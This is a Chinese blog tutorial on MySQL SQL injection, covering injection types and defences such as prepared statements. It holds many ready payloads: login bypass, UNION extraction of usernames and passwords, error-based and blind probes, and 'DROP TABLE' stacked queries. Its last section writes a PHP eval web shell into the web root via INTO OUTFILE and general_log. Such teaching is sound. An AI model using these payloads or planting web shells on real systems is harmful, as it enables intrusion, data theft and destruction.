

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="xiaotian">
  <meta name="keywords" content="xt,blog,个人博客,生活,学习,工作">
  
    <meta name="description" content="本篇研究 SQL注入（SQL Injection），主要从mysql视角 SQL 注入（SQLi） 是一种将恶意 SQL 语句注入到应用程序的数据库查询中的攻击方式，攻击者可利用漏洞读取、修改、删除数据库中的数据，甚至执行数据库系统命令。  原理Web 应用接收用户输入后，直接拼接进 SQL 查询语句中执行，导致攻击者构造的 SQL 语句也一并被执行。 举例：12$username &#x3D; $_GET">
<meta property="og:type" content="article">
<meta property="og:title" content="SQLi详解">
<meta property="og:url" content="https://www.xiaotian.org.cn/2025/05/22/SQLi%E8%AF%A6%E8%A7%A3/index.html">
<meta property="og:site_name" content="xt&#39;s blog">
<meta property="og:description" content="本篇研究 SQL注入（SQL Injection），主要从mysql视角 SQL 注入（SQLi） 是一种将恶意 SQL 语句注入到应用程序的数据库查询中的攻击方式，攻击者可利用漏洞读取、修改、删除数据库中的数据，甚至执行数据库系统命令。  原理Web 应用接收用户输入后，直接拼接进 SQL 查询语句中执行，导致攻击者构造的 SQL 语句也一并被执行。 举例：12$username &#x3D; $_GET">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-05-22T13:00:00.000Z">
<meta property="article:modified_time" content="2025-05-28T14:51:29.588Z">
<meta property="article:author" content="xiaotian">
<meta property="article:tag" content="web安全">
<meta property="article:tag" content="sqli">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>SQLi详解 - xt&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"www.xiaotian.org.cn","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>xt&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="SQLi详解"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-05-22 21:00" pubdate>
          2025年5月22日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.6k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          14 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">SQLi详解</h1>
            
            
              <div class="markdown-body">
                
                <p>本篇研究 SQL注入（SQL Injection），主要从mysql视角</p>
<p><strong>SQL 注入（SQLi）</strong> 是一种将恶意 SQL 语句注入到应用程序的数据库查询中的攻击方式，攻击者可利用漏洞读取、修改、删除数据库中的数据，甚至执行数据库系统命令。</p>
<hr>
<h2 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h2><p>Web 应用接收用户输入后，<strong>直接拼接进 SQL 查询语句中执行</strong>，导致攻击者构造的 SQL 语句也一并被执行。</p>
<h3 id="举例："><a href="#举例：" class="headerlink" title="举例："></a>举例：</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$username</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;username&#x27;</span>];<br><span class="hljs-variable">$sql</span> = <span class="hljs-string">&quot;SELECT * FROM users WHERE username = &#x27;<span class="hljs-subst">$username</span>&#x27;&quot;</span>;<br></code></pre></td></tr></table></figure>

<p>若用户输入：</p>
<figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ada">admin&#x27; <span class="hljs-comment">-- </span><br></code></pre></td></tr></table></figure>

<p>实际 SQL 语句变为：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">SELECT</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">FROM</span> users <span class="hljs-keyword">WHERE</span> username <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;admin&#x27;</span> <span class="hljs-comment">-- &#x27;</span><br></code></pre></td></tr></table></figure>

<p><code>--</code> 是注释符，后面的 <code>&#39;</code> 被注释掉了，绕过语法限制，成功登录。</p>
<hr>
<h2 id="注入类型"><a href="#注入类型" class="headerlink" title="注入类型"></a>注入类型</h2><table>
<thead>
<tr>
<th>类型</th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td><strong>联合注入</strong>（UNION-based）</td>
<td>拼接查询结果</td>
</tr>
<tr>
<td><strong>报错注入</strong>（Error-based）</td>
<td>利用报错信息获取数据</td>
</tr>
<tr>
<td><strong>布尔盲注</strong>（Boolean-based Blind）</td>
<td>判断返回内容真假</td>
</tr>
<tr>
<td><strong>时间盲注</strong>（Time-based Blind）</td>
<td>利用 <code>sleep()</code> 等时间差探测数据</td>
</tr>
<tr>
<td><strong>堆叠注入</strong>（Stacked Queries）</td>
<td>执行多条 SQL 语句（如 <code>1; DROP TABLE users</code>）</td>
</tr>
<tr>
<td><strong>宽字节注入</strong></td>
<td>利用编码差异绕过转义，常见于 GBK 编码场景</td>
</tr>
</tbody></table>
<hr>
<h2 id="payload-示例"><a href="#payload-示例" class="headerlink" title="payload 示例"></a>payload 示例</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-comment">-- 登录绕过</span><br><span class="hljs-string">&#x27; OR 1=1 -- </span><br><span class="hljs-string"></span><br><span class="hljs-string">-- 联合注入（列数探测）</span><br><span class="hljs-string">&#x27;</span> <span class="hljs-keyword">UNION</span> <span class="hljs-keyword">SELECT</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,<span class="hljs-number">3</span> <span class="hljs-comment">-- </span><br><br><span class="hljs-comment">-- 报错注入（MySQL）</span><br><span class="hljs-string">&#x27; AND updatexml(1,concat(0x7e,(SELECT user())),1) -- </span><br><span class="hljs-string"></span><br><span class="hljs-string">-- 时间盲注</span><br><span class="hljs-string">&#x27;</span> <span class="hljs-keyword">AND</span> IF(substr((<span class="hljs-keyword">SELECT</span> database()),<span class="hljs-number">1</span>,<span class="hljs-number">1</span>)<span class="hljs-operator">=</span><span class="hljs-string">&#x27;s&#x27;</span>, SLEEP(<span class="hljs-number">5</span>), <span class="hljs-number">0</span>) <span class="hljs-comment">-- </span><br><br><span class="hljs-comment">-- 堆叠注入（MySQL 默认禁止，SQLServer 允许）</span><br><span class="hljs-string">&#x27;; DROP TABLE users; --</span><br></code></pre></td></tr></table></figure>

<hr>
<h2 id="联合注入"><a href="#联合注入" class="headerlink" title="联合注入"></a>联合注入</h2><p>利用 <code>UNION SELECT</code> 合并查询结果，将注入数据拼接到返回结果中。</p>
<ul>
<li>页面存在 SQL 查询结果回显</li>
<li>UNION 查询的字段数要匹配原始查询字段数</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">UNION</span> <span class="hljs-keyword">SELECT</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,<span class="hljs-number">3</span> <span class="hljs-comment">-- </span><br></code></pre></td></tr></table></figure>

<p>确定字段数后：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">UNION</span> <span class="hljs-keyword">SELECT</span> <span class="hljs-number">1</span>,username,password <span class="hljs-keyword">FROM</span> users <span class="hljs-comment">-- </span><br></code></pre></td></tr></table></figure>

<hr>
<h2 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h2><h3 id="1️⃣-updatexml"><a href="#1️⃣-updatexml" class="headerlink" title="1️⃣ updatexml()"></a>1️⃣ <code>updatexml()</code></h3><ul>
<li><strong>作用</strong>：在构造错误的 XPath 表达式时抛出错误信息</li>
<li><strong>语法</strong>：<code>updatexml(xml_target, xpath_expr, new_value)</code></li>
<li><strong>注入点使用</strong>：</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">AND</span> updatexml(<span class="hljs-number">1</span>,concat(<span class="hljs-number">0x7e</span>,(<span class="hljs-keyword">SELECT</span> database())),<span class="hljs-number">1</span>)<br></code></pre></td></tr></table></figure>

<ul>
<li><strong>结果</strong>：页面返回：</li>
</ul>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-attribute">XPATH</span> syntax <span class="hljs-literal">error</span>: <span class="hljs-string">&#x27;~testdb&#x27;</span><br></code></pre></td></tr></table></figure>

<hr>
<h3 id="2️⃣-extractvalue"><a href="#2️⃣-extractvalue" class="headerlink" title="2️⃣ extractvalue()"></a>2️⃣ <code>extractvalue()</code></h3><ul>
<li><strong>作用</strong>：解析 XPath 表达式时产生错误，抛出回显</li>
<li><strong>语法</strong>：<code>extractvalue(xml_target, xpath_expr)</code></li>
<li><strong>示例</strong>：</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">AND</span> extractvalue(<span class="hljs-number">1</span>,concat(<span class="hljs-number">0x7e</span>,(<span class="hljs-keyword">SELECT</span> <span class="hljs-keyword">user</span>())))<br></code></pre></td></tr></table></figure>

<ul>
<li><strong>结果</strong>：</li>
</ul>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-attribute">XPATH</span> syntax <span class="hljs-literal">error</span>: <span class="hljs-string">&#x27;~root<span class="hljs-variable">@localhost</span>&#x27;</span><br></code></pre></td></tr></table></figure>

<hr>
<h3 id="3️⃣-floor-rand-group-by"><a href="#3️⃣-floor-rand-group-by" class="headerlink" title="3️⃣ floor(rand()) + group by"></a>3️⃣ <code>floor(rand())</code> + <code>group by</code></h3><ul>
<li><strong>原理</strong>：利用 <code>rand()</code> 在 <code>group by</code> 中的重复值导致唯一键错误</li>
<li><strong>示例</strong>：</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">AND</span> (<span class="hljs-keyword">SELECT</span> <span class="hljs-built_in">COUNT</span>(<span class="hljs-operator">*</span>) <span class="hljs-keyword">FROM</span> information_schema.tables <span class="hljs-keyword">GROUP</span> <span class="hljs-keyword">BY</span> CONCAT((<span class="hljs-keyword">SELECT</span> database()), <span class="hljs-built_in">FLOOR</span>(RAND()<span class="hljs-operator">*</span><span class="hljs-number">2</span>))) <span class="hljs-comment">-- </span><br></code></pre></td></tr></table></figure>

<ul>
<li><strong>结果</strong>：页面会报错：</li>
</ul>
<figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ada">Duplicate <span class="hljs-keyword">entry</span> <span class="hljs-symbol">&#x27;testdb1</span>&#x27; <span class="hljs-keyword">for</span> key <span class="hljs-symbol">&#x27;group_key</span>&#x27;<br></code></pre></td></tr></table></figure>

<hr>
<h3 id="4️⃣-geometrycollection"><a href="#4️⃣-geometrycollection" class="headerlink" title="4️⃣ geometrycollection()"></a>4️⃣ <code>geometrycollection()</code></h3><ul>
<li><strong>作用</strong>：使用无效的参数构造几何对象导致错误</li>
<li><strong>示例</strong>（MySQL 5.6+）：</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">AND</span> geometrycollection((<span class="hljs-keyword">SELECT</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">FROM</span> (<span class="hljs-keyword">SELECT</span> CONCAT(<span class="hljs-number">0x7e</span>,(<span class="hljs-keyword">SELECT</span> <span class="hljs-keyword">user</span>()))) <span class="hljs-keyword">AS</span> a))<br></code></pre></td></tr></table></figure>

<hr>
<h3 id="5️⃣-exp-SELECT-（指数溢出）"><a href="#5️⃣-exp-SELECT-（指数溢出）" class="headerlink" title="5️⃣ exp(~(SELECT ...))（指数溢出）"></a>5️⃣ <code>exp(~(SELECT ...))</code>（指数溢出）</h3><ul>
<li><strong>作用</strong>：利用数学函数溢出制造报错</li>
<li><strong>示例</strong>：</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">AND</span> <span class="hljs-built_in">exp</span>(<span class="hljs-operator">~</span>(<span class="hljs-keyword">SELECT</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">FROM</span> (<span class="hljs-keyword">SELECT</span> <span class="hljs-keyword">user</span>()) <span class="hljs-keyword">AS</span> a))<br></code></pre></td></tr></table></figure>

<hr>
<h3 id="6️⃣-name-const"><a href="#6️⃣-name-const" class="headerlink" title="6️⃣ name_const()"></a>6️⃣ <code>name_const()</code></h3><ul>
<li><strong>原理</strong>：同样是触发 <code>Duplicate entry</code> 错误</li>
<li><strong>示例</strong>：</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">AND</span> (<span class="hljs-keyword">SELECT</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">FROM</span> (<span class="hljs-keyword">SELECT</span> name_const((<span class="hljs-keyword">SELECT</span> <span class="hljs-keyword">user</span>()),<span class="hljs-number">1</span>)) <span class="hljs-keyword">AS</span> a)<br></code></pre></td></tr></table></figure>

<blockquote>
<p>在某些新版本中会被限制使用，需要判断 DB 版本。</p>
</blockquote>
<hr>
<h2 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h2><p>注入点没有错误信息或回显，通过页面响应内容的“是否变化”判断真假。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">AND</span> <span class="hljs-number">1</span><span class="hljs-operator">=</span><span class="hljs-number">1</span>    #页面正常<br>?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">AND</span> <span class="hljs-number">1</span><span class="hljs-operator">=</span><span class="hljs-number">2</span>    #页面为空或报错<br></code></pre></td></tr></table></figure>

<p><strong>爆破库名第1个字符是否为 <code>t</code>：</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">AND</span> substr(database(),<span class="hljs-number">1</span>,<span class="hljs-number">1</span>)<span class="hljs-operator">=</span><span class="hljs-string">&#x27;t&#x27;</span><br></code></pre></td></tr></table></figure>

<hr>
<h2 id="时间盲注（Time-based-Blind）"><a href="#时间盲注（Time-based-Blind）" class="headerlink" title="时间盲注（Time-based Blind）"></a>时间盲注（Time-based Blind）</h2><p>页面响应时间作为反馈机制，利用 sleep 等延迟函数判断条件真假。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">AND</span> IF(SUBSTR(<span class="hljs-keyword">user</span>(),<span class="hljs-number">1</span>,<span class="hljs-number">1</span>)<span class="hljs-operator">=</span><span class="hljs-string">&#x27;r&#x27;</span>, SLEEP(<span class="hljs-number">5</span>), <span class="hljs-number">0</span>) <span class="hljs-comment">-- MySQL</span><br>?id<span class="hljs-operator">=</span><span class="hljs-number">1</span>; WAITFOR DELAY <span class="hljs-string">&#x27;0:0:5&#x27;</span> <span class="hljs-comment">-- SQLServer</span><br>?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">AND</span> pg_sleep(<span class="hljs-number">5</span>) <span class="hljs-comment">-- PostgreSQL</span><br></code></pre></td></tr></table></figure>

<p><strong>爆破一个字符一位一位来，脚本配合即可</strong></p>
<hr>
<h2 id="堆叠注入"><a href="#堆叠注入" class="headerlink" title="堆叠注入"></a>堆叠注入</h2><p>一条语句中执行多条 SQL，如：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span>; <span class="hljs-keyword">DROP</span> <span class="hljs-keyword">TABLE</span> users; <span class="hljs-comment">--</span><br></code></pre></td></tr></table></figure>

<ul>
<li>有时无回显</li>
<li>数据库必须支持多语句（如 SQL Server）</li>
<li>MySQL 默认禁用（<code>allow_multi_statements=1</code> 才支持）</li>
</ul>
<hr>
<h2 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h2><p>服务端过滤 <code>&#39;</code> 成为 <code>\&#39;</code>，但在 GBK 编码下，<code>\</code>+字节可能构成一个合法汉字，从而绕过转义。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs sql">输入：<span class="hljs-operator">%</span>df<span class="hljs-string">&#x27; or 1=1 --</span><br><span class="hljs-string">变成：%df\&#x27;</span><br>但在 GBK 中 <span class="hljs-operator">%</span>df\ 与接下来的字符构成合法字符<br></code></pre></td></tr></table></figure>

<p>用于绕过防护、配合报错或盲注。</p>
<h2 id="二次注入"><a href="#二次注入" class="headerlink" title="二次注入"></a>二次注入</h2><ol>
<li>注册账号输入：</li>
</ol>
<figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ada">用户名: admin&#x27;<span class="hljs-comment">-- </span><br></code></pre></td></tr></table></figure>

<p>后端代码（无过滤）：</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs py">db.insert(<span class="hljs-string">&quot;INSERT INTO users (username, email) VALUES (?, ?)&quot;</span>, [username, email])<br></code></pre></td></tr></table></figure>

<p>字段存进了数据库<br>2. 后台根据用户名查找用户：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">query <span class="hljs-operator">=</span> &quot;SELECT * FROM users WHERE username = &#x27;%s&#x27;&quot; <span class="hljs-operator">%</span> username<br></code></pre></td></tr></table></figure>

<p>此时拼接结果为：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">SELECT</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">FROM</span> users <span class="hljs-keyword">WHERE</span> username <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;admin&#x27;</span><span class="hljs-comment">-- &#x27;</span><br></code></pre></td></tr></table></figure>

<p>SQL 逻辑被破坏，可能导致认证绕过或信息泄露。</p>
<h2 id="防御方法"><a href="#防御方法" class="headerlink" title="防御方法"></a>防御方法</h2><table>
<thead>
<tr>
<th>防御手段</th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td>使用 <strong>预编译语句（PreparedStatement）</strong>  #推荐做法</td>
<td>参数不会被当作 SQL</td>
</tr>
<tr>
<td>对用户输入进行严格校验</td>
<td>禁止非法字符，如 <code>&#39;</code> <code>;</code> <code>--</code> 等</td>
</tr>
<tr>
<td>最小权限原则</td>
<td>数据库账号只授予必要权限</td>
</tr>
<tr>
<td>错误信息不外泄</td>
<td>禁止返回 SQL 错误给用户</td>
</tr>
<tr>
<td>使用 Web 应用防火墙（WAF）</td>
<td>拦截可疑 payload</td>
</tr>
<tr>
<td>开启日志审计和异常监控</td>
<td>及时发现 SQL 注入行为</td>
</tr>
</tbody></table>
<hr>
<h2 id="预编译示例（安全写法）"><a href="#预编译示例（安全写法）" class="headerlink" title="预编译示例（安全写法）"></a>预编译示例（安全写法）</h2><p><strong>PHP（PDO）示例：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$stmt</span> = <span class="hljs-variable">$pdo</span>-&gt;<span class="hljs-title function_ invoke__">prepare</span>(<span class="hljs-string">&quot;SELECT * FROM users WHERE username = :username&quot;</span>);<br><span class="hljs-variable">$stmt</span>-&gt;<span class="hljs-title function_ invoke__">execute</span>([<span class="hljs-string">&#x27;username&#x27;</span> =&gt; <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;username&#x27;</span>]]);<br></code></pre></td></tr></table></figure>

<p><strong>Python（SQLite）示例：</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">cursor.execute(<span class="hljs-string">&quot;SELECT * FROM users WHERE id=?&quot;</span>, (user_input,))<br></code></pre></td></tr></table></figure>

<h2 id="MySQL-写-WebShell-利用技巧"><a href="#MySQL-写-WebShell-利用技巧" class="headerlink" title="MySQL 写 WebShell 利用技巧"></a>MySQL 写 WebShell 利用技巧</h2><h3 id="利用-into-outfile"><a href="#利用-into-outfile" class="headerlink" title="利用 into outfile"></a>利用 <code>into outfile</code></h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">SELECT</span> &quot;&lt;?php @eval($_POST[&#x27;cmd&#x27;]); ?&gt;&quot; <span class="hljs-keyword">INTO</span> OUTFILE <span class="hljs-string">&#x27;/var/www/html/shell.php&#x27;</span>;<br></code></pre></td></tr></table></figure>

<h3 id="日志写入WebShell"><a href="#日志写入WebShell" class="headerlink" title="日志写入WebShell"></a>日志写入WebShell</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">SET</span> <span class="hljs-keyword">GLOBAL</span> general_log <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;ON&#x27;</span>;								#开启日志<br><span class="hljs-keyword">SET</span> <span class="hljs-keyword">GLOBAL</span> general_log_file <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;/var/www/html/shell.php&#x27;</span>;	#设置日志文件路径<br><span class="hljs-keyword">SELECT</span> <span class="hljs-string">&#x27;&lt;?php @eval($_POST[&quot;cmd&quot;]); ?&gt;&#x27;</span>;					#写入一句话 WebShell<br><span class="hljs-keyword">SET</span> <span class="hljs-keyword">GLOBAL</span> general_log <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;OFF&#x27;</span>;								#关闭日志<br></code></pre></td></tr></table></figure>

<h3 id="UDF提权"><a href="#UDF提权" class="headerlink" title="UDF提权"></a>UDF提权</h3><p><strong>UDF</strong> 是 MySQL 允许用户用 C&#x2F;C++ 编写的动态库（<code>.so</code> 或 <code>.dll</code> 文件），加载到 MySQL 后可作为函数调用。</p>
<p>通过 UDF，可以执行一些原本 SQL 不支持的功能，比如访问系统级 API。</p>
<p>攻击者利用上传或写入恶意 UDF 文件，实现数据库进程权限的系统命令执行。</p>
